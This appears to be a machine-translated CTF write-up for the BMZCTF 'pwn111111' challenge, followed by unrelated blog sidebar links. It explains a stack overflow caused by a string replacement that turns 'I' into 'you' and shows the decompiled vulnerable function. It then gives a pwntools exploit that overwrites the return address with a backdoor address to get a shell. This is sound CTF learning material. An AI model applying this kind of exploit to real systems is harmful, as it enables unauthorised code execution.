当前位置:网站首页>[BMZCTF-pwn] 11-pwn111111
[BMZCTF-pwn] 11-pwn111111
2022-07-06 10:43:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
There is still no remote environment , However, this stack overflow is related to libc It's not a big deal .
The program is hard to understand , notice replace Here should be input I convert to YOU. I tried it, and it turned out to be . use gdb After follow-up, I found that 60 Bytes of space will be input 32 After byte replacement, it is filled and overflowed , But the overflow is not too big , Even if you put ebp Add in 21 individual I The simplest vulnerability cannot be reached after replacement rop(plt.puts,ret,got.puts) The length of . Then look back , Here is a door , Just overflow directly and write the back door .
int vuln()
{
const char *v0; // eax
char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
char v4[7]; // [esp+40h] [ebp-18h] BYREF
char v5; // [esp+47h] [ebp-11h] BYREF
char v6[7]; // [esp+48h] [ebp-10h] BYREF
char v7[5]; // [esp+4Fh] [ebp-9h] BYREF
printf("Tell me something about yourself: ");
fgets(s, 32, edata);
std::string::operator=(&input, s);
std::allocator<char>::allocator(&v5);
std::string::string(v4, "you", &v5);
std::allocator<char>::allocator(v7);
std::string::string(v6, "I", v7);
replace((std::string *)v3); // hold I Replace with YOU
std::string::operator=(&input, v3, v6, v4);
std::string::~string(v3);
std::string::~string(v6);
std::allocator<char>::~allocator(v7);
std::string::~string(v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(s, v0);
return printf("So, %s\n", s);
}
from pwn import *
p = process('./pwn')
context(arch='i386', log_level='debug')
p.sendline(b'I'*20+b'XXXX'+p32(0x8048f0d))
p.recv()
p.interactive()
边栏推荐
- Discriminant model: a discriminant model creation framework log linear model
- @controller,@service,@repository,@component区别
- Windchill configure remote Oracle database connection
- Not registered via @EnableConfigurationProperties, marked(@ConfigurationProperties的使用)
- Global and Chinese market of wafer processing robots 2022-2028: Research Report on technology, participants, trends, market size and share
- Have you mastered the correct posture of golden three silver four job hopping?
- API learning of OpenGL (2004) gl_ TEXTURE_ MIN_ FILTER GL_ TEXTURE_ MAG_ FILTER
- MySQL19-Linux下MySQL的安装与使用
- MySQL transaction log
- C语言标准的发展
猜你喜欢
MySQL combat optimization expert 02 in order to execute SQL statements, do you know what kind of architectural design MySQL uses?
Ueeditor internationalization configuration, supporting Chinese and English switching
[after reading the series] how to realize app automation without programming (automatically start Kwai APP)
Pytoch LSTM implementation process (visual version)
CSDN问答标签技能树(五) —— 云原生技能树
MySQL33-多版本并发控制
Not registered via @EnableConfigurationProperties, marked(@ConfigurationProperties的使用)
MySQL26-性能分析工具的使用
Security design verification of API interface: ticket, signature, timestamp
Record the first JDBC
随机推荐
Moteur de stockage mysql23
Use JUnit unit test & transaction usage
Unicode decodeerror: 'UTF-8' codec can't decode byte 0xd0 in position 0 successfully resolved
MySQL29-数据库其它调优策略
百度百科数据爬取及内容分类识别
Transactions have four characteristics?
ZABBIX introduction and installation
Mysql25 index creation and design principles
API learning of OpenGL (2002) smooth flat of glsl
① BOKE
[untitled]
Mysql21 user and permission management
实现以form-data参数发送post请求
Mysql30 transaction Basics
Kubesphere - deploy the actual combat with the deployment file (3)
CSDN问答标签技能树(五) —— 云原生技能树
基于Pytorch的LSTM实战160万条评论情感分类
Complete web login process through filter
MySQL storage engine
高并发系统的限流方案研究,其实限流实现也不复杂